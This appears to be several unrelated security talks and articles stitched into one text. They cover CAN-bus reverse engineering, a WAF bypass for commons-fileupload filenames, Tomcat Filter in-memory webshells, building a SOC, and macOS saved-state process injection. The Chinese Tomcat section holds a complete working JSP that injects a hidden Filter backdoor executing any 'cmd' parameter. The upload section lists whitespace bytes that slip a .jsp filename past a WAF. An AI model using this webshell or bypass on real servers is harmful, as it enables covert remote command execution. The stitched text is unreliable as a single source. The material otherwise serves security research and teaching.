http://www.flickr.com/photos/kriztofor/3253758933/sizes/o/in/photostream/
Fight
Back
http://www.flickr.com/photos/superwebdeveloper/5604789818/
sizes/l/in/photostream/
Capture
The
Flag
The
winner
takes
all
hUp://cY.doublethunk.org | pdf |
REVERSE ENGINEERING
17 CARS
IN UNDER 10 MINUTES
BRENT
STONE
Disclaimer About This Talk and The Github Repo
The views expressed in this presentation are those of the
author and do not reflect the official policy or position of the
United States Air Force, the United States Army, the United
States Department of Defense or the United States
Government. The material publicly released on
https://github.com/brent-stone/CAN_Reverse_Engineering/,
up to and including commit ac0e55f on 26 March 2019, is
declared a work of the U.S. Government and is not subject
to copyright protection in the United States.
APPROVED FOR PUBLIC RELEASE; DISTRIBUTION UNLIMITED
Case Numbers: 88ABW-2019-0910, 88ABW-2019-0024
A
B
FLEXIBLE
UNDETERMINABLE
• Modify End Points
• Modify Routing
• No delivery guarantee
• No timeliness guarantee
n end points
General Use Networks
Meta
Data
Meta
Data
A
B
DETERMINABLE
INFLEXIBLE
• Delivery Guarantee
• Timeliness Guarantee
• Fixed End Points
• Fixed Routing
Control Networks
C
D
E
Meta
Data
Meta
Data
Lots of people helping
others play with
general use networks…
Automated Reverse Engineering of
General Use Networks
1. P. Ducange, G. Mannara, F. Marcelloni, R. Pecori, and M. Vecchio, "A novel approach for internet traffic classification based on multi-objective evolutionary fuzzy
classiffiers," in 2017 IEEE International Conference on Fuzzy Systems (FUZZ-IEEE), 2017, pp. 1-6.
2. J. Yuan, Z. Li, and R. Yuan, "Information entropy based clustering method for unsupervised internet traffic classification," in IEEE International Conference on
Communications (ICC), 2008, pp. 1588-1592.
3. C. Besiktas and H. A. Mantar, "Real-Time Traffic Classiffication Based on Cosine Similarity Using Sub-application Vectors," in Proceedings of the Traffic Monitoring
and Analysis 4th International Workshop, 2012, vol. 7189, pp. 89-92.
4. A. Trifilo, S. Burschka, and E. Biersack, "Traffic to protocol reverse engineering," in IEEE Symposium on Computational Intelligence for Security and Defense
Applications (CISDA), 2009, pp. 1-8.
5. M. E. DeYoung, "Dynamic protocol reverse engineering: a grammatical inference approach," Air Force Institute of Technology, 2008.
6. W. Cui, M. Peinado, K. Chen, H. J.Wang, and L. Irun-Briz, "Tupni: Automatic Reverse Engineering of Input Formats," in 15th ACM Conference on Computer and
Communications Security (CCS), 2008, pp. 391-402.
7. J. Newsome, D. Brumley, J. Franklin, and D. Song, "Replayer: automatic protocol replay by binary analysis," in 13th ACM conference on Computer and
Communications Security (CCS), 2006, p. 311.
8. J. Caballero, P. Poosankam, C. Kreibich, and S. D., "Dispatcher: Enabling active botnet infiltration using automatic protocol reverse-engineering," in 16th ACM
Conference on Computer and Communications Security (CCS), 2009, pp. 621-634.
9. J. Caballero, H. Yin, Z. Liang, and D. Song, "Polyglot: Automatic Extraction of Protocol Message Format using Dynamic Binary Analysis," in 14th ACM Conference
on Computer and Communications Security (CCS), 2007, pp. 317-329.
10.W. Cui, V. Paxson, N. C. Weaver, and R. H. Katz, "Protocol-Independent Adaptive Replay of Application Dialog," in Network and Distributed System Security
Symposium (NDSS), 2006, pp. 279-293.
Meta
Data
Automated Reverse Engineering of
General Use Networks
11.M. Wakchaure, S. Sarwade, I. Siddavatam, and P. Range, "Reconnaissance of Industrial Control System By Deep Packet Inspection," in 2nd IEEE International
Conference on Engineering and Technology (ICETECH), 2016, no. 3, pp. 1093-1096.
12.J. Antunes, N. Neves, and P. Verissimo, "Reverse engineering of protocols from network traces," in 18th Working Conference on Reverse Engineering, 2011, pp.
169-178.
13.M. A Beddoe, "Network protocol analysis using bioinformatics algorithms," McAfee, Santa Clara, CA, USA, 1, 2004.
14.Y. Wang, Z. Zhang, D. Yao, B. Qu, and L. Guo, "Inferring Protocol State Machine from Network Traces: A Probabilistic Approach," in International Conference on
Applied Cryptography and Network Security, 2011, pp. 1-18.
15.P. M. Comparetti, G. Wondracek, C. Kruegel, and E. Kirda, "Prospex: Protocol specification extraction," in IEEE Symposium on Security and Privacy, 2009, pp.
110-125.
16.J. Erman and M. Arlitt, "Traffic classification using clustering algorithms," in 2006 SIGCOMM Workshop on Mining Network Data, 2006, pp. 281-286.
17.F. Alam, R. Mehmood, I. Katib, and A. Albeshri, "Analysis of Eight Data Mining Algorithms for Smarter Internet of Things (IoT)," in International Workshop on Data
Mining in IoT Systems (DaMIS 2016), 2016, vol. 98, no. 1, pp. 437-442.
18.Y. Wang et al., "A semantics aware approach to automated reverse engineering unknown protocols," in 20th IEEE International Conference on Network Protocols
(ICNP), 2012, pp. 1-10.
19.J. Roning, "PROTOS Protocol Genome Project," Oulu University Secure Programming Group, 2010. [Online]. Available: https://www.ee.oulu.fi/roles/ouspg/genome.
[Accessed: 01-Jan-2017].
20.R. L. S. Puupera, "Domain Model Based Black Box Fuzzing Using Regular Languages," University of Oulu, 2010.
21.K. Choi, Y. Son, J. Noh, H. Shin, J. Choi, and Y. Kim, "Dissecting Customized Protocols: Automatic Analysis for Customized Protocols Based on IEEE 802.15.4," in
9th International Conference on Security of Information and Networks, 2016, pp. 183-193.
Meta
Data
Automated Reverse Engineering of
General Use Networks
22.Y. Wang, Y. Xiang, J. Zhang, and S. Yu, "A novel semi-supervised approach for network traffic clustering," in 5th International Conference on Network and System
Security (NSS), 2011, pp. 169-175.
23.W. Cui, J. Kannan, and H. J. Wang, "Discoverer: Automatic Protocol Reverse Engineering from Network Traces," in USENIX Security, 2007, no. 2, pp. 199-212.
24.J. Zhang, C. Chen, Y. Xiang, and W. Zhou, "Semi-supervised and compound classiffication of network traffic," in Proceedings 32nd IEEE International Conference
on Distributed Computing Systems Workshops (ICDCSW), 2012, pp. 617-621.
25.T. Glennan, C. Leckie, and S. M. Erfani, "Improved Classification of Known and Unknown Network Traffic Flows Using Semi-supervised Machine Learning," in 21st
Australasian Conference on Information Security and Privacy (ACISP), 2016, vol. 2, pp. 493-501.
Meta
Data
But what about robots, cars,
and other control networks?
Now your computer can help!
Hi! Do you need
assistance?
#Started canhandler on can0
#Setup complete: 48.7387
#Format:
Time:
ID
DLC
Data
48.740: 4a8 8
00
00
00
40
00
00
00
00
48.740: 020 7
00
00
07
01
00
00
2f
48.742: 0b4 8
00
00
00
00
ac
00
00
68
48.742: 025 8
00
11
00
00
78
78
78
a6
48.743: 024 8
02
00
02
08
62
04
81
1f
48.743: 235 6
00
00
00
00
00
3d
48.744: 499 8
00
00
35
00
00
00
00
00
48.745: 49a 8
00
85
20
03
46
80
28
a8
48.746: 49b 8
00
a0
1a
20
00
00
48
10
48.746: 262 5
20
00
00
00
89
48.747: 49d 8
61
60
03
d1
9d
19
c6
c5
48.747: 1c4 8
00
00
00
00
00
00
00
cd
48.749: 0aa 8
1a
6f
1a
6f
1a
6f
1a
6f
48.749: 0b6 4
00
00
00
ba
48.749: 224 8
00
00
00
00
00
00
00
08
48.751: 127 8
68
10
00
08
00
0c
ed
a9
48.751: 020 7
00
00
07
01
00
00
2f
48.751: 230 7
d4
43
00
00
00
00
50
48.752: 025 8
00
11
00
00
82
82
82
c4
…….
Click!
Code on GitHub does this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Different Control Network Protocol?
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Just change this →
The demo is doing this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
I’ll walk you through this…
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
This is a sentence!
Lexical & Semantic Analysis
This is a sentence!
Lexical Analysis
Tokens
This is a sentence!
Semantic Analysis
Token
Type
noun
This is a sentence!
Time
Bit 0 ……………………….. Bit 63
48.45
1
…………………………
0
48.95
1
…………………………
0
49.46
1
…………………………
0
49.96
0
…………………………
0
50.46
0
…………………………
0
50.96
1
…………………………
0
…
…
…
…
64-bit Payloads
Lexical Analysis
Payload Tokenization
Time
Bit 0 ……………………….. Bit 63
48.45
1
…………………………
0
48.95
1
…………………………
0
49.46
1
…………………………
0
49.96
0
…………………………
0
50.46
0
…………………………
0
50.96
1
…………………………
0
…
…
…
…
64-bit Payloads
Time (s)
Lexical Analysis
Payload Tokenization
Time
Bit 0 ……………………….. Bit 63
48.45
1
…………………………
0
48.95
1
…………………………
0
49.46
1
…………………………
0
49.96
0
…………………………
0
50.46
0
…………………………
0
50.96
1
…………………………
0
…
…
…
…
64-bit Payloads
Lexical Analysis
Payload Tokenization
This is a sentence!
Time
Bit 0 ……………………….. Bit 63
48.45
1
…………………………
0
48.95
1
…………………………
0
49.46
1
…………………………
0
49.96
0
…………………………
0
50.46
0
…………………………
0
50.96
1
…………………………
0
…
…
…
…
64-bit Payloads
Time (s)
Lexical Analysis
Payload Tokenization
Payload Tokenization
By Least Significant Bit
0
1
2
3
4
5
6
7
8
9
7 =
0
1
1
1
0
0
0
0
0
0
= 0
8 =
1
0
0
0
0
0
0
0
0
1
= 1
9 =
1
0
0
1
0
0
0
0
1
0
= 2
10 =
1
0
1
0
0
0
0
0
1
1
= 3
11 =
1
0
1
1
0
0
0
1
0
0
= 4
12 =
1
1
0
0
0
0
0
1
0
1
= 5
13 =
1
1
0
1
0
0
0
1
1
0
= 6
14 =
1
1
1
0
0
0
0
1
1
1
= 7
Bit Position:
Observed
Payloads
0
1
2
3
4
5
6
7
8
9
0
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
1
0
0
1
0
0
0
0
1
0
1
0
1
0
0
0
0
0
1
1
1
0
1
1
0
0
0
1
0
0
1
1
0
0
0
0
0
1
0
1
1
1
0
1
0
0
0
1
1
0
1
1
1
0
0
0
0
1
1
1
0
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
1
0
0
1
0
0
0
0
1
0
1
0
1
0
0
0
0
0
1
1
1
0
1
1
0
0
0
1
0
0
1
1
0
0
0
0
0
1
0
1
1
1
0
1
0
0
0
1
1
0
1
1
1
0
0
0
0
1
1
1
A B Output
0 0
0
0 1
1
1 0
1
1 1
0
0
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
1
0
0
1
0
0
0
0
1
0
1
0
1
0
0
0
0
0
1
1
1
0
1
1
0
0
0
1
0
0
1
1
0
0
0
0
0
1
0
1
1
1
0
1
0
0
0
1
1
0
Bit Position:
Payload Tokenization
By Least Significant Bit
0
1
2
3
4
5
6
7
8
9
1
1
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
1
0
0
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
1
1
1
0
1
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
1
0
0
1
1
0
0
0
0
0
1
A B Output
0 0
0
0 1
1
1 0
1
1 1
0
Bit Position:
Payload Tokenization
By Least Significant Bit
0
1
2
3
4
5
6
7
8
9
1
1
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
1
0
0
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
1
1
1
0
1
1
1
0
0
0
0
0
1
0
0
0
1
0
0
0
0
1
1
0
0
1
1
0
0
0
0
0
1
Bit Position:
+
1
2
4
7
0
0
0
1
3
7
Payload Tokenization
By Least Significant Bit
1
2
4
7
0
0
0
1
3
7
Payload Tokenization
By Least Significant Bit
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Time (s)
Time (s)
Payload Tokenization
By Least Significant Bit
Unsupervised Reverse Engineering
Empirical Data Modeling to detect causality
Combine correlated and causal links to
make a network map
Lexical Analysis
Protocol Specific Preprocessing
Semantic Analysis
Group Payloads by Logical Source
TANG Generation
Cluster Payload Bit Positions
Signal Correlation
Signal Subset Selection*
*optional
Cluster Correlated Signals
Generate Logical Network Map
Detect Causality Between Signals
Agglomerative Hierarchical Clustering
Pearson’s Correlation Coefficient
Shannon Diversity Index (Entropy)
Modified Hill Climbing Algorithm
Exclusive Or (XOR)
Time (s)
Time (s)
[26] SAE International, “SAE J1979: E/E Diagnostic Test Modes,” 2017.
J1979 Speed [26]
Semantic Analysis
Correlated and Causal Relationships
SHOW ME WHAT YOU GOT!
Let’s reverse
engineer
some cars!
https://github.com/brent-stone/CAN_Reverse_Engineering
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 1
VEHICLE 2
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 3
VEHICLE 4
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 5
VEHICLE 6
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 7
VEHICLE 8
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 9
VEHICLE 10
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 11
VEHICLE 12
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 13
VEHICLE 14
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 15
VEHICLE 16
CROPPED
TO FIT ON
SLIDE
https://github.com/brent-stone/CAN_Reverse_Engineering
VEHICLE 17
QUESTIONS
BRENT
STONE | pdf |
1
从commons-fileupload源码看⽂件上传绕waf
之前hvv的时候遇到个⽂件上传,有waf没绕过去就想着从⽂件上传解析流程看看有什么可利⽤的地⽅,
于是有了这篇⽂章。
那次主要是⽂件名的地⽅绕不过去,尝试了挺多⽅法就不⼀⼀说了。
⾸先搭建了⼀个和⽬标类似的环境,使⽤commons-fileupload做⽂件上传。
⾸先在 formLists = fileUpload.parseRequest(request); 处打断点跟⼊⽂件上传解析流
程。
注意到下⾯肯定是以及解析完了,那么解析的地⽅肯定在箭头处。
跟⼊到 org.apache.commons.fileupload.FileUploadBase.FileItemIteratorImpl#Fil
eItemIteratorImpl
⼀、前⾔
⼆、filename获取流程
2
注意到这个地⽅,也就是说我们的 Content-Type 其实只要开头为 multipart/ 就⾏可以不要 fo
rm-data
后⾯就是根据 boundary 把请求进⾏分割
中间过程不想讲太多也有⼀些⽐较有趣的地⽅,我们直接到获取⽂件名的地⽅。
org.apache.commons.fileupload.FileUploadBase#getFileName(java.lang.String)
3
此处进⾏解析,然后获取filename的值
这⾥就是获取参数名和参数值。跟⼊ parseToken
4
isOneOf
geToken
5
⼤概意思是⽤先⽤分号将 form-data; name="file"; filename="11111.jsp" 分割然后获取
等于号前⾯的值
注意到 Character.isWhitespace
6
这个是判断师傅是空⽩字符⽽且不⽌我们常⽤的空格还包括
此时想到了绕waf的点了,我们可以在filename的前后加⼊这种空⽩符导致waf匹配不到我们上传⽂件
名,⽽我们上传依然可以解析。
Plain Text
复制代码
%20
%09
%0a
%0b
%0c
%0d
%1c
%1d
%1e
%1f
1
2
3
4
5
6
7
8
9
10
7
⾄此⽂件名处已经绕过waf,内容处绕法很多就不讲了。
当时就注意到这个地⽅,后⾯仔细看了还有很多点,然后还看了.NET
的 context.Request.Files 也有⼀些有趣的地⽅,⼤家可以去看看。 | pdf |
Filter内存马
分类
filter 内存马是 servlet-api 内存马下的一种,在tomcat高版本中存在实现了动态注册 tomcat
组件的方法,其中就存在 addFilter 方法,用于动态注册 Filter .
Filter 生命周期
如果之前有调试tomcat源码的话可以知道 Filter 是在 tomcat 服务器启动时通过 init 方法启动
的,服务器关闭时通过 destroy 方法销毁。中间通过执行 doFilter 方法进行进行过滤。
public class demoFilter implements Filter {
@Override
public void init(FilterConfig filterConfig) throws ServletException {
System.out.println("Filter init.....");
}
@Override
public void doFilter(ServletRequest request, ServletResponse response,
FilterChain chain) throws IOException, ServletException {
System.out.println("Filter执行了");
//考虑是否放行
//放行
chain.doFilter(request,response);
System.out.println("filter返回了");
request.getServletContext().addFilter();
}
@Override
public void destroy() {
System.out.println("Filter destroy.....");
}
}
从源码角度来看看 Filter 的生命周期
1. 初始化:filter在服务器的初始化阶段完成。filter注册
org.apache.catalina.core.ApplicationContext
在服务器初始化阶段 ApplicationContext 类中会首先判断状态,之后进行 Filter 的初始化阶段,将
Filter 相关信息填充到 filterDefs , filterMaps , filterConfigs 两个参数。此处应该注意的是
context对象表示的是StandarContext对象
2. 首先是 filterDefs 参数填充:
3. 之后是 filterMaps 的填充:
4. 最后是 filterConfigs 的填充:这一步是在执行过滤器的 init 方法之后
5. 之后在 standardContext 类中进行类的初始化。这一步会调用 Filter 的 init 方法
6. Filter 执行:首先是 FilterChain 的创建和添加。 Filter 的创建是在初始化阶段,但是每一次
请求都会重新创建这个 FilterChain ,并且会将 servlet 放入 FilterChain 当中。
7. 在 createFilterChain 中会遍历初始化时填充的 filterMaps ,取出 filter 信息,然后组装
filterChain
8. 销毁:在服务器关闭时销毁。
Filter 内存马思路
按照上面源代码中 Filter 的初始化过程,我们通过获取 StandardContext 属性,然后模拟填充
过程,将三个参数填充完毕即可。然后在下一次请求的过程中就会自动将我们自定义的 filter 组
装到 FilterChain 当中。
源码参考:n1nty-Tomcat源代码调试笔记-看不见的shell这篇文章应该是最开始研究内存马的文章
了。原理就是一直通过反射获取到 StandardContext 属性,然后填充 Filter 的三个属性。
<%@ page language="java" contentType="text/html; charset=UTF-8"
pageEncoding="UTF-8"%>
<%@ page import="java.io.IOException"%>
<%@ page import="javax.servlet.DispatcherType"%>
<%@ page import="javax.servlet.Filter"%>
<%@ page import="javax.servlet.FilterChain"%>
<%@ page import="javax.servlet.FilterConfig"%>
<%@ page import="javax.servlet.FilterRegistration"%>
<%@ page import="javax.servlet.ServletContext"%>
<%@ page import="javax.servlet.ServletException"%>
<%@ page import="javax.servlet.ServletRequest"%>
<%@ page import="javax.servlet.ServletResponse"%>
<%@ page import="javax.servlet.annotation.WebServlet"%>
<%@ page import="javax.servlet.http.HttpServlet"%>
<%@ page import="javax.servlet.http.HttpServletRequest"%>
<%@ page import="javax.servlet.http.HttpServletResponse"%>
<%@ page import="org.apache.catalina.core.ApplicationContext"%>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig"%>
<%@ page import="org.apache.catalina.core.StandardContext"%>
<%@ page import="org.apache.tomcat.util.descriptor.web.*"%>
<%@ page import="org.apache.catalina.Context"%>
<%@ page import="java.lang.reflect.*"%>
<%@ page import="java.util.EnumSet"%>
<%@ page import="java.util.Map"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
final String name = "n1ntyfilter";
ServletContext ctx = request.getSession().getServletContext();
Field f = ctx.getClass().getDeclaredField("context");
f.setAccessible(true);
ApplicationContext appCtx = (ApplicationContext)f.get(ctx);
f = appCtx.getClass().getDeclaredField("context");
f.setAccessible(true);
StandardContext standardCtx = (StandardContext)f.get(appCtx);
f = standardCtx.getClass().getDeclaredField("filterConfigs");
f.setAccessible(true);
Map filterConfigs = (Map)f.get(standardCtx);
if (filterConfigs.get(name) == null) {
out.println("inject "+ name);
Filter filter = new Filter() {
@Override
public void init(FilterConfig arg0) throws ServletException {
// TODO Auto-generated method stub
}
@Override
public void doFilter(ServletRequest arg0, ServletResponse arg1,
FilterChain arg2)
throws IOException, ServletException {
// TODO Auto-generated method stub
HttpServletRequest req = (HttpServletRequest)arg0;
if (req.getParameter("cmd") != null) {
byte[] data = new byte[1024];
Process p = new ProcessBuilder("cmd.exe","/c",
req.getParameter("cmd")).start();
int len = p.getInputStream().read(data);
p.destroy();
arg1.getWriter().write(new String(data, 0, len));
return;
}
arg2.doFilter(arg0, arg1);
}
@Override
public void destroy() {
// TODO Auto-generated method stub
}
};
FilterDef filterDef = new FilterDef();
filterDef.setFilterName(name);
filterDef.setFilterClass(filter.getClass().getName());
filterDef.setFilter(filter);
standardCtx.addFilterDef(filterDef);
FilterMap m = new FilterMap();
m.setFilterName(filterDef.getFilterName());
m.setDispatcher(DispatcherType.REQUEST.name());
m.addURLPattern("/*");
standardCtx.addFilterMapBefore(m);
Constructor constructor =
ApplicationFilterConfig.class.getDeclaredConstructor(Context.class,
FilterDef.class);
首先访问jsp文件,注入 Filter
之后访问任何请求都会首先经过我们的 Filter ,带上命令就可执行。
constructor.setAccessible(true);
FilterConfig filterConfig =
(FilterConfig)constructor.newInstance(standardCtx, filterDef);
filterConfigs.put(name, filterConfig);
out.println("injected");
}
%>
</body>
</html> | pdf |
For
little
or
no
money…
What
is
a
Security
Opera0ons
Center
(SOC)
Events
IDS
Management
System
Analyst
Systems
Analysts
Contextual
Info
Reporting
Incident
Response
Why
do
you
need
a
SOC?
Central
location
to
collect
information
on
threats
• External
Threats
• Internal
Threats
• User
activity
• Loss
of
systems
and
personal
or
sensitive
data
• Provide
evidence
in
investigations
Keep
your
organization
running
• Health
of
your
network
and
systems
Isn’t
a
Firewall,
IDS
or
AV
enough?
Firewall
is
active
and
known
by
attackers
Protects
your
systems,
not
your
users
Anti-‐Virus
Lag-‐time
to
catch
new
threats
Matches
files,
but
not
traffic
patterns.
IDS
alerts
on
events,
but
doesn’t
provide
context
System
logs
Proxy
logs
DNS
logs
Information
from
other
people
Private
Network
People
Management
Users
Other
Experts
Analysts
Lab
Analyst
Systems
Management
Systems
IDS
Structure
of
a
SOC
vs
Techie
using
real-‐time
tech
24/7
Private
network
Secure
communication
between
IDS
Management
System
Analyst
Systems
Management
and
update
of
IDS
and
rules
IDS
system
Secured
OS
IDS
Software
• Snort
• Barnyard2
• Pulled
Pork
• stunnel
Packet
capture
• TCPDump
• Daemonlogger
Management
system
Secured
OS
LAMP
Management
Software
• BASE,
Snorby,
OCCIM,
Splunk,
Nagios,
etc.
Analyst
Systems
Secured
OS
Management
System
Interface
Analysis
tools
• Wireshark
• Tcpdump
• Netwitness
But
I
thought
you
wanted
a
secure
system!
Lab
Test
system
Test
rules
on
the
IDS
Test
Configuration
changes
Can
be
used
as
a
backup
A
safe
environment
to:
Play
with
malware
Try
hacks
These
activities
can
help
you
to
discover
the
criteria
to
build
custom
rules
for
the
IDS.
It’s
probably
a
good
idea
to
use
VM’s
for
your
lab.
Analysts
(the
meat
of
the
opera0on)
You
need
highly
skilled
people
who:
Know
networking
Understand
attacks
Understand
Malware
Are
comfortable
with
things
like
source
code,
hex,
etc…
Are
open
to
new
ideas
Are
creative
thinkers
Are
good
at
deductive
reasoning
and
critical
thinking
Have
a
passion
for
this
Don’t
blink
Don’t
ever
call
in
sick
Don’t
need
sleep
Love
to
keep
learning
Other
experts
System/Network
Administrators
Keep
the
whole
thing
working
Tune
IDS
rules
Forensics
Experts
For
more
in-‐depth
analysis
Incident
Response
To
mitigate
incidents
after
they
happen
External
entities
Government,
law
enforcement,
etc…
Users
(the
other
white
meat)
Report
things
Phishing
emails
Stolen
property
Loss
of
data
Do
things
Download
malware
Engage
in
inappropriate
activities
The
most
widely
deployed
IDS
you
have
If
“tuned”
properly…
Management
To
interface
with
other
entities
Keep
all
the
pieces
from
falling
apart
Make
it
rain
(decide
who
gets
the
money)
I
guess
someone
has
to
make
decisions...
Network
Events
Log
files
• Firewalls
• Hosts
• Proxy
Servers
• DNS
Servers
Phone
calls/
emails/
other
sources
The
data
Handling
all
that
data
All
that
data!
Filtering
False
Positives
Thresholding
Categorization
Categoriza0on
Category
Name
CAT
0
Exercise/Network
Defense
Testing
CAT
1
Successful
unauthorized
Access
CAT
2
Denial
of
service
CAT
3
Successful
installation
or
post-‐install
beaconing
of
malicious
code
CAT
4
Improper
Usage
CAT
5
Scans/probes/Attempted
Access
CAT
6
Investigation
US-‐CERT
Recommends
the
following
categories
for
events
Analyzing
something
like
malware
Mi0ga0on/Incident
Response
User
education
User
access
controls
Stop
giving
users
administrative
access
Proxy
servers
and
firewalls
Deny
access
to
known
bad
sites
Deny
certain
kinds
of
downloads
Block
posting
to
known
bad
IP’s | pdf |
>>
>>
Process injection
Breaking All macOS Security Layers
With a Single Vulnerability
>>
Hello!
I’m
Security researcher at Computest
Thijs Alkemade
>Thijs Alkemade (@xnyhps)
>Security researcher at Computest
>Computest research lab: Sector 7
>Other recent work includes:
- 0click Zoom RCE at Pwn2Own
Vancouver 2021
- Winning Pwn2Own Miami 2022 with 5
ICS vulnerabilities
About me
1. macOS security model
2. CVE-2021-30873: process injection using saved states
3. Using process injection for:
- Sandbox escape
- Privilege escalation
- SIP bypass
In this talk
macOS security model
In macOS 12 Monterey
>Users are security boundaries,
processes are not
>File permissions: POSIX flags
>Attach debugger: target must run
as same user
>root has full access
Old *NIX security model
>“Dangerous” operations now require the application to have an
entitlement
- Loading a kernel extension
- Modifying system files
- Debugging system processes
>More and more restrictions in each macOS release
- Debugging any app is now restricted
- “Data vaults” with restricted file access
SIP restrictions
>Process A executing code “as”
process B
>Many techniques are restricted by
SIP
>Hardened runtime prevents it in
apps:
- No DYLD_* environment variables
- Library validation
>But macOS is old, and large…
Process injection
>Common in third-party app
>Abuse TCC permissions: access webcam, microphone, etc.
>Downgrade attacks often work
>What’s better than process injection in one app? Process injection
everywhere!
Process injection
CVE-2021-30873
Process injection in AppKit
>Re-opening the windows of an app
when relaunched
>Restores unsaved documents
>Works automatically, can be
extended by developers
Saved state feature
>Stored in:
- ~/Library/Saved Application
State/<ID>.savedState
>windows.plist
- array of all windows, each with an
encryption key
>data.data
- custom format, AES-CBC encrypted
serialized object per record
Saved state storage
>Insecure deserialization can lead
to RCE
- Well known in C#, Java, Python, Ruby…
>Apple’s serialization is NSCoding
>Added NSSecureCoding in 10.8
(2012)
Serialization vulnerabilities
// Insecure
id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* ...fail... */
}
// Secure
id obj = [decoder decodeObjectOfClass:[MyClass class]
forKey:@"myKey"];
1. Create a saved state using a malicious serialized object
2. Write it to the saved state directory of the other app
3. Launch other app
4. App automatically deserializes our object
5. Execute code in the other app!
Exploiting for process injection
>ysoserial-objective-c?
>Google Project Zero writeups?
What object to write?
Insecure deserialization with NSCoding
And defeating the hardened runtime by executing Python
>Disassemble -initWithCoder: methods
>Surprisingly, many classes do not support secure coding!
>…but in most cases it only recursively decodes instance variables
Search for an object chain
> NSRuleEditor creates a binding to a keypath also from the archive:
ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
...
id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];
...
if (arrayOwner) {
keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
[self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];
}
...
}
> Result: call any zero-argument method on a deserialized object
Step 1: NSRuleEditor
> NSCustomImageRep obtains an object and selector from the archive:
ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
...
self.drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
self.drawMethod = NSSelectorFromString(drawMethod);
...
}
Step 2: NSCustomImageRep
> NSCustomImageRep in –draw then calls the selector on the object:
void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
{
...
[self.drawObject performSelector:self.drawMethod withObject:self];
...
}
> Result: call any method on a deserialized object (limited control over arguments)
